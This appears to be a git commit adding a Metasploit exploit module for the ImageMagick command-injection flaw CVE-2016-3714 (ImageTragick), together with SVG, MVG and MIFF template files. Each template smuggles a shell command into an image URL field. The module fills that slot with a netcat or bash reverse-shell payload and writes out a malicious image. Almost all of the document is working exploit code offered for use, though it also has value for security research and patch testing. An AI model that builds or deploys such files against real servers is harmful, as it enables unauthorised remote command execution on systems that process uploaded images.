Add ImageMagick exploit
parent
891a788ad4
commit
5c04db7a09
|
@ -0,0 +1,14 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";Lorem ipsum"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -0,0 +1,8 @@
|
|||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 'url(https:";Lorem ipsum")'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
|
@ -0,0 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="https:";Lorem ipsum"" />
|
||||
</svg>
|
After Width: | Height: | Size: 488 B |
|
@ -0,0 +1,73 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a command injection in ImageMagick <= 7.0.1-0.
|
||||
},
|
||||
'Author' => [
|
||||
'stewie', # Vulnerability discovery
|
||||
'Nikolay Ermishkin', # Vulnerability discovery
|
||||
'wvu', # Metasploit module
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
%w{CVE 2016-3714},
|
||||
%w{URL https://imagetragick.com/}
|
||||
],
|
||||
'DisclosureDate' => 'May 3 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c", # ", ', and \
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic netcat bash-tcp'
|
||||
}
|
||||
},
|
||||
'Targets' => [
|
||||
['SVG file', template: 'msf.svg'],
|
||||
['MVG file', template: 'msf.mvg'],
|
||||
['MIFF file', template: 'msf.miff']
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'DisablePayloadHandler' => false,
|
||||
'WfsDelay' => 9001
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
if target.name == 'SVG file'
|
||||
p = Rex::Text.html_encode(payload.encoded)
|
||||
else
|
||||
p = payload.encoded
|
||||
end
|
||||
|
||||
file_create(template.sub('Lorem ipsum', p))
|
||||
end
|
||||
|
||||
def template
|
||||
File.read(File.join(
|
||||
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
|
||||
))
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue